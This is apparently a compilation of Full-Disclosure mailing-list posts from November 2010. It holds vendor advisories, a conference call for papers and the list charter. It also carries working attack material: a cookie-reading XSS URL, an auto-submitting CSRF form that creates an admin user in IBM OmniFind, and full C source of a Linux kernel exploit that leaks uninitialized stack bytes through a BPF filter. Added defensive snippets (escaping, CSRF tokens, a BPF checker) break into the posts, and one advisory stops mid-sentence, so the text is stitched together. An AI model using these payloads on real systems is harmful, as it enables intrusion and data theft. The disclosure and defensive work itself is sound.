[Full-disclosure] IBM OmniFind - several vulnerabilities
Security Advisory

CVE-2010-3890 (CVE candidate)
CVE-2010-3891 (CVE candidate)
CVE-2010-3892 (CVE candidate)
CVE-2010-3893 (CVE candidate)
CVE-2010-3894 (CVE candidate)
CVE-2010-3895 (CVE candidate)
CVE-2010-3896 (CVE candidate)
CVE-2010-3897 (CVE candidate)
CVE-2010-3898 (CVE candidate)
CVE-2010-3899 (CVE candidate)

IBM OmniFind several issues
===

Date released: 11/2010
Date reported: 04/2009

by Fatih Kilic
Fraunhofer Institute for Secure Information Technology
fatih.ki...@sit.fraunhofer.de

http://security.fatihkilic.de/advisory/fkilic-sa-2010-ibm-omnifind.txt
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3890
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3891
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3892
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3893
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3894
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3895
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3896
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3897
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3898
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3899

Vendor: IBM
Product: IBM OmniFind Enterprise Edition
Website: http://www-01.ibm.com/software/data/enterprise-search/omnifind-enterprise/

Vulnerabilities:
- Cross-Site-Scripting (XSS)
- Cross-Site-Request-Forgery (XSRF)
- Session fixation
- Session impersonation
- Remote buffer overflow
- Privilege escalation in two applications
- Missing authentication in configuration panel
- Admin password is delivered in plaintext inside the server response
- Cookies are set for root path, not application path
- Crawler endless loop

+ Background:

Quoting http://www-01.ibm.com/software/data/enterprise-search/omnifind-enterprise/:

| IBM(R) OmniFind(tm) Enterprise Edition drives users to the information that matters through knowledge driven search.
| It's designed to drive users to the knowledge they seek and enhance the visibility of content and context of your organization's unstructured information.
|
| * Dynamic - delivers complete dynamic facet capabilities, type-ahead search, real-time content alerting, is reactive to search-led content exploration
| * Tailorable - delivers business adjustable relevancy and UIMA standardization for entity identification and tuned semantic searching
| * Supportable - delivers search on 20+ platforms, connects to 30+ repositories
| * Secure - delivers enforced security across content repositories
| * Scalable - lucene-based index for enterprise level scalability

+ Overview:

+ Technical details:

* Cross-Site-Scripting (XSS) (CVE-2010-3890)

The GET parameter »command« used inside the administration interface is embedded directly into the HTML source without any input validation or output sanitization. Using this parameter the attacker can inject arbitrary JavaScript code which will be run in the session context of other users. As session credentials are stored within cookies, an attacker can steal the cookie information and impersonate (CVE-2010-3893) the session and control the web application within the browser context of the victim.

Exploit to show cookies:

http://omnifind-host/ESAdmin/collection.do?command=<script>alert(document.cookie);</script>

* Cross-Site-Request-Forgery (XSRF) (CVE-2010-3891)

The forms in the administrator interface are not protected against XSRF. The attacker can do any action in the context of the victim. An example attack scenario could be: the attacker creates a malicious website with a prepared form to add a new user, which will be submitted on load.
Exploit to add an admin user:

<html>
<head><title>Some seemingly benign web-site</title></head>
<body onLoad="document.forms[0].submit();">
<form method="post" action="http://omnifind-host/ESAdmin/security.do">
<input type="hidden" name="command" value="saveNewUser"/>
<input type="hidden" name="user.name" value="joemueller"/>
<input type="hidden" name="user.role" value="0"/>
<input type="hidden" name="user.allCollections" value="true"/>
<input type="hidden" name="apply" value="OK"/>
</form>
</body>
</html>

Solution: Fixed in release v9.1 of Omnifind.

* Session fixation (CVE-2010-3892)

The login form of the administrator interface is vulnerable to session fixation attacks. An attacker can use a prepared website or a XSS vulnerability (CVE-2010-3890) to change the session ID (SID) of the login form. The SID have to
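The three issues described above (the »command« parameter reflected into HTML unencoded, a saveNewUser form with no anti-forgery token, and a login that keeps whatever SID the browser already presents) each have a standard server-side fix. The following is an added example, not code from the advisory or from OmniFind: it models the ESAdmin handlers as plain Python functions with assumed names (render_collection_page, security_do, login), a constructed in-memory session store and a constant stand-in credential check, and runs the advisory's own XSS URL and XSRF form fields against the weak and the hardened behaviour.

```python
import html
import secrets
from urllib.parse import urlsplit, unquote

# Constructed in-memory session store: sid -> session dict (assumption, not OmniFind's).
SESSIONS = {}

def render_collection_page(command):
    """Vulnerable rendering: reflects the GET parameter verbatim into the HTML page."""
    return "<h1>Collection</h1><p>command: " + command + "</p>"

def render_collection_page_safe(command):
    """Hardened rendering: output-encodes the parameter for an HTML text context."""
    return "<h1>Collection</h1><p>command: " + html.escape(command, quote=True) + "</p>"

def command_from_url(url):
    """Extract the 'command' query parameter the way collection.do would receive it."""
    for pair in urlsplit(url).query.split("&"):
        name, _, value = pair.partition("=")
        if name == "command":
            return unquote(value)
    return ""

def new_session():
    """Create a session with an unguessable SID and a per-session synchronizer token."""
    sid = secrets.token_hex(16)
    SESSIONS[sid] = {"authenticated": False, "csrf": secrets.token_hex(16), "users": []}
    return sid

def login(presented_sid, username, password):
    """Hardened login: the SID the client presented is never promoted to authenticated.

    The pre-login session (which an attacker may have planted via a prepared site or
    the XSS bug) is discarded and a fresh SID is issued, so a fixated SID is useless.
    The credential check is a constructed stand-in, not a real password store.
    """
    if not (username == "admin" and password == "correct-horse"):
        return None
    SESSIONS.pop(presented_sid, None)
    sid = new_session()
    SESSIONS[sid]["authenticated"] = True
    return sid

def security_do(sid, form, csrf_protected=True):
    """Model of ESAdmin/security.do handling command=saveNewUser.

    csrf_protected=False behaves like the advisory's vulnerable form: any request
    sent by an authenticated browser creates the user, wherever the form came from.
    csrf_protected=True requires the session's token, which a cross-origin
    auto-submitting form cannot know, so the forged POST is rejected.
    """
    session = SESSIONS.get(sid)
    if session is None or not session["authenticated"]:
        return 403, "not authenticated"
    if form.get("command") != "saveNewUser":
        return 400, "unknown command"
    if csrf_protected and not secrets.compare_digest(form.get("csrf_token", ""), session["csrf"]):
        return 403, "missing or invalid CSRF token"
    session["users"].append({"name": form["user.name"], "role": form["user.role"],
                             "allCollections": form["user.allCollections"] == "true"})
    return 200, "user created"

# The exact hidden fields from the advisory's XSRF proof of concept.
FORGED_FORM = {"command": "saveNewUser", "user.name": "joemueller", "user.role": "0",
               "user.allCollections": "true", "apply": "OK"}

def demo():
    """Run the three scenarios and return the observable outcomes."""
    xss_url = "http://omnifind-host/ESAdmin/collection.do?command=<script>alert(document.cookie);</script>"
    payload = command_from_url(xss_url)
    planted = new_session()                        # SID an attacker could fixate before login
    sid = login(planted, "admin", "correct-horse")
    weak = security_do(sid, FORGED_FORM, csrf_protected=False)
    hard = security_do(sid, FORGED_FORM, csrf_protected=True)
    legit = security_do(sid, dict(FORGED_FORM, csrf_token=SESSIONS[sid]["csrf"]))
    return {
        "reflected_unescaped": "<script>" in render_collection_page(payload),
        "reflected_escaped": "<script>" in render_collection_page_safe(payload),
        "sid_rotated": sid != planted and planted not in SESSIONS,
        "forged_without_token": weak[0],
        "forged_with_token_check": hard[0],
        "legit_with_token": legit[0],
        "users_created": len(SESSIONS[sid]["users"]),
    }

if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```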
[Full-disclosure] Hackito Ergo Sum 2011 - Call For Paper - HES2011 CFP
Hackito Ergo Sum 2011 - Call For Paper - HES2011 CFP
** http://hackitoergosum.org **
7-9 April 2011 / Paris / France

HES 2011
Paris, 7-9 April 2011

--[ Synopsis:

Hackito Ergo Sum conference will be held from April 7th to the 9th of 2011 in Paris, France. Following last edition's success, HES2011 will be a bigger event with even more talks, focusing on hardcore computer network security, insecurity, vulnerability analysis, reverse engineering, research and hacking, and will try to keep the high quality content. Our dear Program Committee is there to ensure this.

HES will this year be a fully international-oriented conference, 100% in English, aiming to gather the best security researchers, experts and decision makers in one room.

--[ Introduction:

The goal of this conference is to promote security research, broaden public awareness and create an open forum so that communication between the researchers, the security industry, the experts and the public can happen.

Last year, we pioneered a domain with the first Capture The Flag (CTF) contest on FPGA, with excellent results that exceeded by far our expectations. This year, new contests will run with hopefully even more diverse and new approaches to security. Of course, network-based CTF and lockpicking contests will still happen.

We will have a specific session for new works, including slots for new presenters - i.e. typically people whose personal research is extremely interesting but who do not usually present at conferences - because security innovations occur at the fringe of the security industry, very often by passionate people, and that's what we are and love. Submissions from students, academics or otherwise passionate people from anywhere on the internet are therefore most welcome.

We will also have an anonymous side track so that people who wish to present sensitive subjects can do so in total freedom. As
[Full-disclosure] List Charter
[Full-Disclosure] Mailing List Charter
John Cartwright jo...@grok.org.uk

- Introduction & Purpose -

This document serves as a charter for the [Full-Disclosure] mailing list hosted at lists.grok.org.uk. The list was created on 9th July 2002 by Len Rose, and is primarily concerned with security issues and their discussion. The list is administered by John Cartwright. The Full-Disclosure list is hosted and sponsored by Secunia.

- Subscription Information -

Subscription/unsubscription may be performed via the HTTP interface located at http://lists.grok.org.uk/mailman/listinfo/full-disclosure. Alternatively, commands may be emailed to full-disclosure-requ...@lists.grok.org.uk; send the word 'help' in either the message subject or body for details.

- Moderation & Management -

The [Full-Disclosure] list is unmoderated. Typically posting will be restricted to members only, however the administrators may choose to accept submissions from non-members based on individual merit and relevance. It is expected that the list will be largely self-policing, however in special circumstances (eg spamming, misappropriation) offending members may be removed from the list by the management. An archive of postings is available at http://lists.grok.org.uk/pipermail/full-disclosure/.

- Acceptable Content -

Any information pertaining to vulnerabilities is acceptable, for instance announcement and discussion thereof, exploit techniques and code, related tools and papers, and other useful information. Gratuitous advertisement, product placement, or self-promotion is forbidden. Disagreements, flames, arguments, and off-topic discussion should be taken off-list wherever possible. Humour is acceptable in moderation, providing it is inoffensive. Politics should be avoided at all costs. Members are reminded that due to the open nature of the list, they should use discretion in executing any tools or code distributed via this list.

- Posting Guidelines -

The primary language of this list is English. Members are expected to maintain a reasonable standard of netiquette when posting to the list. Quoting should not exceed that which is necessary to convey context; this is especially relevant to members subscribed to the digested version of the list. The use of HTML is discouraged, but not forbidden. Signatures will preferably be short and to the point, and those containing 'disclaimers' should be avoided where possible. Attachments may be included if relevant or necessary (e.g. PGP or S/MIME signatures, proof-of-concept code, etc) but must not be active (in the case of a worm, for example) or malicious to the recipient. Vacation messages should be carefully configured to avoid replying to list postings. Offenders will be excluded from the mailing list until the problem is corrected. Members may post to the list by emailing full-disclos...@lists.grok.org.uk. Do not send subscription/unsubscription mails to this address; use the -request address mentioned above.

- Charter Additions/Changes -

The list charter will be published at http://lists.grok.org.uk/full-disclosure-charter.html. In addition, the charter will be posted monthly to the list by the management. Alterations will be made after consultation with list members and a consensus has been reached.

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [ MDVSA-2010:222 ] mysql
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

___
Mandriva Linux Security Advisory                         MDVSA-2010:222
http://www.mandriva.com/security/
___

Package : mysql
Date    : November 9, 2010
Affected: 2009.0, Corporate 4.0, Enterprise Server 5.0
___

Problem Description:

Multiple vulnerabilities were discovered and corrected in mysql:

* Joins involving a table with a unique SET column could cause a server crash (CVE-2010-3677).
* Use of TEMPORARY InnoDB tables with nullable columns could cause a server crash (CVE-2010-3680).
* The server could crash if there were alternate reads from two indexes on a table using the HANDLER interface (CVE-2010-3681).
* Using EXPLAIN with queries of the form SELECT ... UNION ... ORDER BY (SELECT ... WHERE ...) could cause a server crash (CVE-2010-3682).
* During evaluation of arguments to extreme-value functions (such as LEAST() and GREATEST()), type errors did not propagate properly, causing the server to crash (CVE-2010-3833).
* The server could crash after materializing a derived table that required a temporary table for grouping (CVE-2010-3834).
* A user-variable assignment expression that is evaluated in a logical expression context can be precalculated in a temporary table for GROUP BY. However, when the expression value is used after creation of the temporary table, it was re-evaluated, not read from the table, and a server crash resulted (CVE-2010-3835).
* Pre-evaluation of LIKE predicates during view preparation could cause a server crash (CVE-2010-3836).
* GROUP_CONCAT() and WITH ROLLUP together could cause a server crash (CVE-2010-3837).
* Queries could cause a server crash if the GREATEST() or LEAST() function had a mixed list of numeric and LONGBLOB arguments, and the result of such a function was processed using an intermediate temporary table (CVE-2010-3838).
* Queries with nested joins could cause an infinite loop in the server when used from stored procedures and prepared statements (CVE-2010-3839).
* The PolyFromWKB() function could crash the server when improper WKB data was passed to the function (CVE-2010-3840).

Additionally the default behaviour of using the mysqlmanager instead of the mysqld_safe script has been reverted in the SysV init script because of instability issues with the mysqlmanager.

Packages for 2009.0 are provided as of the Extended Maintenance Program. Please visit this link to learn more:
http://store.mandriva.com/product_info.php?cPath=149&products_id=490

The updated packages have been upgraded to mysql 5.0.91 and patched to correct these issues.
___

References:

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3677
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3680
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3681
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3682
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3833
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3834
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3835
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3836
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3837
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3838
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3839
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3840
http://dev.mysql.com/doc/refman/5.0/en/news-5-0-91.html
http://bugs.mysql.com/bug.php?id=54575
http://bugs.mysql.com/bug.php?id=54044
http://bugs.mysql.com/bug.php?id=54007
http://bugs.mysql.com/bug.php?id=52711
http://bugs.mysql.com/bug.php?id=55826
http://bugs.mysql.com/bug.php?id=55568
http://bugs.mysql.com/bug.php?id=55564
http://bugs.mysql.com/bug.php?id=54568
http://bugs.mysql.com/bug.php?id=54476
http://bugs.mysql.com/bug.php?id=54461
http://bugs.mysql.com/bug.php?id=53544
http://bugs.mysql.com/bug.php?id=51875
___

Updated Packages:

Mandriva Linux 2009.0:
[Full-disclosure] ZDI-10-244: Apple Quicktime Movie Malformed H.264 Sample Remote Code Execution Vulnerability
ZDI-10-244: Apple Quicktime Movie Malformed H.264 Sample Remote Code Execution Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-10-244
November 9, 2010

-- CVE ID:
CVE-2010-0515

-- CVSS:
9, (AV:N/AC:L/Au:N/C:P/I:P/A:C)

-- Affected Vendors:
Apple

-- Affected Products:
Apple Quicktime

-- Vulnerability Details:
This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Apple QuickTime Player. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.

The specific flaw exists during the parsing of samples from a malformed MOV file utilizing the H.264 codec. While parsing data to render the stream, the application will miscalculate a length that is used to initialize a heap chunk that was allocated in a header. If the length is larger than the size of the chunk allocated, then a memory corruption will occur which can lead to code execution under the context of the application.

-- Vendor Response:
Apple states:
Fixed in QuickTime 7.6.6
http://support.apple.com/kb/HT4104

-- Disclosure Timeline:
2009-12-04 - Vulnerability reported to vendor
2010-11-09 - Coordinated public release of advisory

-- Credit:
This vulnerability was discovered by:
* Anonymous

-- About the Zero Day Initiative (ZDI):
Established by TippingPoint, The Zero Day Initiative (ZDI) represents a best-of-breed model for rewarding security researchers for responsibly disclosing discovered vulnerabilities.

Researchers interested in getting paid for their security research through the ZDI can find more information and sign-up at:

    http://www.zerodayinitiative.com

The ZDI is unique in how the acquired vulnerability information is used. TippingPoint does not re-sell the vulnerability details or any exploit code. Instead, upon notifying the affected product vendor, TippingPoint provides its customers with zero day protection through its intrusion prevention technology.
Explicit details regarding the specifics of the vulnerability are not exposed to any parties until an official vendor patch is publicly available. Furthermore, with the altruistic aim of helping to secure a broader user base, TippingPoint provides this vulnerability information confidentially to security vendors (including competitors) who have a vulnerability protection or mitigation product.

Our vulnerability disclosure policy is available online at:

    http://www.zerodayinitiative.com/advisories/disclosure_policy/

Follow the ZDI on Twitter:

    http://twitter.com/thezdi
[Full-disclosure] [ MDVSA-2010:223 ] mysql
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

___
Mandriva Linux Security Advisory                         MDVSA-2010:223
http://www.mandriva.com/security/
___

Package : mysql
Date    : November 9, 2010
Affected: 2009.1, 2010.0, 2010.1
___

Problem Description:

Multiple vulnerabilities were discovered and corrected in mysql:

* During evaluation of arguments to extreme-value functions (such as LEAST() and GREATEST()), type errors did not propagate properly, causing the server to crash (CVE-2010-3833).
* The server could crash after materializing a derived table that required a temporary table for grouping (CVE-2010-3834).
* A user-variable assignment expression that is evaluated in a logical expression context can be precalculated in a temporary table for GROUP BY. However, when the expression value is used after creation of the temporary table, it was re-evaluated, not read from the table, and a server crash resulted (CVE-2010-3835).
* Pre-evaluation of LIKE predicates during view preparation could cause a server crash (CVE-2010-3836).
* GROUP_CONCAT() and WITH ROLLUP together could cause a server crash (CVE-2010-3837).
* Queries could cause a server crash if the GREATEST() or LEAST() function had a mixed list of numeric and LONGBLOB arguments, and the result of such a function was processed using an intermediate temporary table (CVE-2010-3838).
* Queries with nested joins could cause an infinite loop in the server when used from stored procedures and prepared statements (CVE-2010-3839).
* The PolyFromWKB() function could crash the server when improper WKB data was passed to the function (CVE-2010-3840).

The updated packages have been patched to correct these issues.
___

References:

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3833
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3834
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3835
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3836
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3837
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3838
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3839
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3840
http://bugs.mysql.com/bug.php?id=55826
http://bugs.mysql.com/bug.php?id=55568
http://bugs.mysql.com/bug.php?id=55564
http://bugs.mysql.com/bug.php?id=54568
http://bugs.mysql.com/bug.php?id=54476
http://bugs.mysql.com/bug.php?id=54461
http://bugs.mysql.com/bug.php?id=53544
http://bugs.mysql.com/bug.php?id=51875
___

Updated Packages:

Mandriva Linux 2009.1:
[Full-disclosure] ZDI-10-245: Microsoft Office PowerPoint Unknown Animation Node Remote Code Execution Vulnerability
ZDI-10-245: Microsoft Office PowerPoint Unknown Animation Node Remote Code Execution Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-10-245
November 9, 2010

-- CVE ID:
CVE-2010-2573

-- CVSS:
9, (AV:N/AC:L/Au:N/C:P/I:P/A:C)

-- Affected Vendors:
Microsoft

-- Affected Products:
Microsoft Office PowerPoint

-- TippingPoint(TM) IPS Customer Protection:
TippingPoint IPS customers have been protected against this vulnerability by Digital Vaccine protection filter ID 10630. For further product information on the TippingPoint IPS, visit:

    http://www.tippingpoint.com

-- Vulnerability Details:
This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Microsoft Office Powerpoint 2003. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.

The specific flaw exists within the application trusting a value defined within a file. This value will have some arithmetic performed on it, and subsequently be used as a counter for a processing loop. By modifying this value, an attacker can reliably corrupt memory. Successful exploitation will lead to code execution under the context of the application.

-- Vendor Response:
Microsoft has issued an update to correct this vulnerability. More details can be found at:

    http://www.microsoft.com/technet/security/bulletin/ms10-088.mspx

-- Disclosure Timeline:
2010-06-02 - Vulnerability reported to vendor
2010-11-09 - Coordinated public release of advisory

-- Credit:
This vulnerability was discovered by:
* Anonymous
[Full-disclosure] ZDI-10-246: Microsoft Excel MSODrawing Improper Exception Handling Remote Code Execution Vulnerability
ZDI-10-246: Microsoft Excel MSODrawing Improper Exception Handling Remote Code Execution Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-10-246
November 9, 2010

-- CVE ID:
CVE-2010-3335

-- CVSS:
9, (AV:N/AC:L/Au:N/C:P/I:P/A:C)

-- Affected Vendors:
Microsoft

-- Affected Products:
Microsoft Office Excel

-- TippingPoint(TM) IPS Customer Protection:
TippingPoint IPS customers have been protected against this vulnerability by Digital Vaccine protection filter ID 10634. For further product information on the TippingPoint IPS, visit:

    http://www.tippingpoint.com

-- Vulnerability Details:
This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Microsoft Office. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.

The specific flaw exists within how the application frees resources when parsing a malformed Office Art record. Due to the application not properly freeing up resources during handling a parsing error, the application will later access the freed reference which can lead to code execution under the context of the application.

-- Vendor Response:
Microsoft has issued an update to correct this vulnerability. More details can be found at:

    http://www.microsoft.com/technet/security/bulletin/MS10-087.mspx

-- Disclosure Timeline:
2010-06-30 - Vulnerability reported to vendor
2010-11-09 - Coordinated public release of advisory

-- Credit:
This vulnerability was discovered by:
* Anonymous
[Full-disclosure] [ MDVSA-2010:225 ] libmbfl
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

___
Mandriva Linux Security Advisory                         MDVSA-2010:225
http://www.mandriva.com/security/
___

Package : libmbfl
Date    : November 9, 2010
Affected: 2010.0, 2010.1
___

Problem Description:

A vulnerability was discovered and corrected in libmbfl (php):

* Fix bug #53273 (mb_strcut() returns garbage with the excessive length parameter) (CVE-2010-4156).

The updated packages have been patched to correct these issues.
___

References:

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4156
http://bugs.php.net/bug.php?id=49354
http://bugs.php.net/bug.php?id=53273
___

Updated Packages:

Mandriva Linux 2010.0:
Mandriva Linux 2010.0/X86_64:
Mandriva Linux 2010.1:
Mandriva Linux 2010.1/X86_64:
___

To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you.

All packages are signed by Mandriva for security.
You can obtain the GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/security/advisories

If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
___

Type Bits/KeyID     Date       User ID
pub  1024D/22458A98 2000-07-10 Mandriva Security Team <security*mandriva.com>
[Full-disclosure] Kernel 0-day
Enjoy...

-Dan

/*
 * You've done it. After hours of gdb and caffeine, you've finally got a shell
 * on your target's server. Maybe next time they will think twice about
 * running MyFirstCompSciProjectFTPD on a production machine. As you take
 * another sip of Mountain Dew and pick some of the cheetos out of your beard,
 * you begin to plan your next move - it's time to tackle the kernel.
 *
 * What should be your goal? Privilege escalation? That's impossible, there's
 * no such thing as a privilege escalation vulnerability on Linux. Denial of
 * service? What are you, some kind of script kiddie? No, the answer is
 * obvious. You must read the uninitialized bytes of the kernel stack, since
 * these bytes contain all the secrets of the universe and the meaning of life.
 *
 * How can you accomplish this insidious feat? You immediately discard the
 * notion of looking for uninitialized struct members that are copied back to
 * userspace, since you clearly need something far more elite. In order to
 * prove your superiority, your exploit must be as sophisticated as your taste
 * in obscure electronic music. After scanning the kernel source for good
 * candidates, you find your target and begin to code...
 *
 * by Dan Rosenberg
 *
 * Greets to kees, taviso, jono, spender, hawkes, and bla
 *
 */

#include <string.h>
#include <stdio.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <sys/socket.h>
#include <unistd.h>
#include <stdlib.h>
#include <linux/filter.h>

#define PORT 37337

/* Parent receives one datagram on recvsock and returns the number of bytes
 * the attached filter let through; the child sends a 512-byte zero-filled
 * datagram to it on the loopback interface. */
int transfer(int sendsock, int recvsock)
{
	struct sockaddr_in addr;
	char buf[512];
	socklen_t len = sizeof(addr);

	memset(buf, 0, sizeof(buf));

	if (fork())
		return recvfrom(recvsock, buf, 512, 0, (struct sockaddr *)&addr, &len);

	sleep(1);
	memset(&addr, 0, sizeof(addr));
	addr.sin_family = AF_INET;
	addr.sin_port = htons(PORT);
	addr.sin_addr.s_addr = inet_addr("127.0.0.1");
	sendto(sendsock, buf, 512, 0, (struct sockaddr *)&addr, len);
	exit(0);
}

int main(int argc, char *argv[])
{
	int sendsock, recvsock, ret;
	unsigned int val;
	struct sockaddr_in addr;
	struct sock_fprog fprog;
	struct sock_filter filters[5];

	if (argc != 2) {
		printf("[*] Usage: %s offset (0-63)\n", argv[0]);
		return -1;
	}

	val = atoi(argv[1]);

	if (val > 63) {
		printf("[*] Invalid byte offset (must be 0-63)\n");
		return -1;
	}

	recvsock = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
	sendsock = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);

	if (recvsock < 0 || sendsock < 0) {
		printf("[*] Could not create sockets.\n");
		return -1;
	}

	memset(&addr, 0, sizeof(addr));
	addr.sin_family = AF_INET;
	addr.sin_port = htons(PORT);
	addr.sin_addr.s_addr = htonl(INADDR_ANY);

	if (bind(recvsock, (struct sockaddr *)&addr, sizeof(addr)) < 0) {
		printf("[*] Could not bind socket.\n");
		return -1;
	}

	memset(&fprog, 0, sizeof(fprog));
	memset(filters, 0, sizeof(filters));

	/* Load scratch word M[val/4] (never stored by this program), isolate
	 * the selected byte, add 256 and return it as the accepted length. */
	filters[0].code = BPF_LD|BPF_MEM;
	filters[0].k = (val & ~0x3) / 4;
	filters[1].code = BPF_ALU|BPF_AND|BPF_K;
	filters[1].k = 0xff << ((val % 4) * 8);
	filters[2].code = BPF_ALU|BPF_RSH|BPF_K;
	filters[2].k = (val % 4) * 8;
	filters[3].code = BPF_ALU|BPF_ADD|BPF_K;
	filters[3].k = 256;
	filters[4].code = BPF_RET|BPF_A;

	fprog.len = 5;
	fprog.filter = filters;

	if (setsockopt(recvsock, SOL_SOCKET, SO_ATTACH_FILTER, &fprog, sizeof(fprog)) < 0) {
		printf("[*] Failed to install filter.\n");
		return -1;
	}

	ret = transfer(sendsock, recvsock);

	/* The 8-byte UDP header is stripped from the accepted length, so the
	 * received byte count is 248 plus the leaked byte. */
	printf("[*] Your byte: 0x%.02x\n", ret - 248);

	return 0;
}
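The filter in the post above begins with BPF_LD|BPF_MEM, a load from scratch cell M[k] that no instruction has ever stored, so whatever the kernel left in that memory becomes the return value. The defensive fix for this class of bug is a verifier pass at filter-attach time that rejects any program reading a scratch cell not written on every path leading to it. The following checker is an added example written for this page, not the kernel's code; it redefines the classic BPF opcode values locally so it builds without kernel headers, and it tracks initialized cells across jumps as well as straight-line code.

```c
#include <stdint.h>
#include <string.h>
/* Classic BPF opcode values (as in linux/filter.h, redefined so this builds
 * without kernel headers); an instruction is {code, jt, jf, k}. */
enum { BPF_LD = 0x00, BPF_LDX = 0x01, BPF_ST = 0x02, BPF_STX = 0x03,
       BPF_JMP = 0x05, BPF_MEM = 0x60, BPF_JA = 0x00, BPF_MEMWORDS = 16 };
#define BPF_CLASS(c) ((c) & 0x07)
#define BPF_MODE(c)  ((c) & 0xe0)
#define BPF_OP(c)    ((c) & 0xf0)
#define MAX_INSNS 256
struct bpf_insn { uint16_t code; uint8_t jt, jf; uint32_t k; };

/* Returns 1 if every load from scratch cell M[k] is preceded, on every path
 * reaching it, by a store to M[k]; 0 otherwise. Illustrative checker written
 * for this example, not the kernel's code. */
int filter_mem_reads_initialized(const struct bpf_insn *f, int flen)
{
    uint16_t masks[MAX_INSNS];  /* cells valid on every edge into insn pc */
    uint16_t valid = 0;         /* cells valid on the path reaching pc */
    int pc;
    if (flen <= 0 || flen > MAX_INSNS) return 0;
    memset(masks, 0xff, sizeof(masks));
    for (pc = 0; pc < flen; pc++) {
        uint16_t code = f[pc].code;
        uint32_t k = f[pc].k;
        valid &= masks[pc];     /* merge with state arriving via jumps */
        switch (BPF_CLASS(code)) {
        case BPF_ST: case BPF_STX:
            if (k >= BPF_MEMWORDS) return 0;
            valid |= (uint16_t)(1u << k);
            break;
        case BPF_LD: case BPF_LDX:
            if (BPF_MODE(code) == BPF_MEM &&
                (k >= BPF_MEMWORDS || !(valid & (1u << k))))
                return 0;       /* would read a never-written cell */
            break;
        case BPF_JMP:           /* propagate state to the targets only */
            if (BPF_OP(code) == BPF_JA) {
                if (pc + 1 + k >= (uint32_t)flen) return 0;
                masks[pc + 1 + k] &= valid;
            } else {
                if (pc + 1 + f[pc].jt >= flen || pc + 1 + f[pc].jf >= flen)
                    return 0;
                masks[pc + 1 + f[pc].jt] &= valid;
                masks[pc + 1 + f[pc].jf] &= valid;
            }
            valid = 0xffff;     /* insn pc+1 is reachable only via a jump */
            break;
        }
    }
    return 1;
}
```

Run against the post's five-instruction program the checker returns 0 at the first instruction; prepend a store to M[0] and it returns 1.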
Re: [Full-disclosure] Kernel 0-day
http://marc.info/?l=linux-netdev&m=128934173821229&w=2

On Tue, Nov 9, 2010 at 5:18 PM, Dan Rosenberg <dan.j.rosenb...@gmail.com> wrote:
> Enjoy...
>
> -Dan
>
> [...]
[Full-disclosure] ZDI-10-247: Novell Groupwise GWPOA HTTP Request Remote Code Execution Vulnerability
ZDI-10-247: Novell Groupwise GWPOA HTTP Request Remote Code Execution Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-10-247
November 9, 2010

-- CVSS:
10, (AV:N/AC:L/Au:N/C:C/I:C/A:C)

-- Affected Vendors:
Novell

-- Affected Products:
Novell Groupwise

-- TippingPoint(TM) IPS Customer Protection:
TippingPoint IPS customers have been protected against this vulnerability by Digital Vaccine protection filter ID 10328. For further product information on the TippingPoint IPS, visit:

    http://www.tippingpoint.com

-- Vulnerability Details:
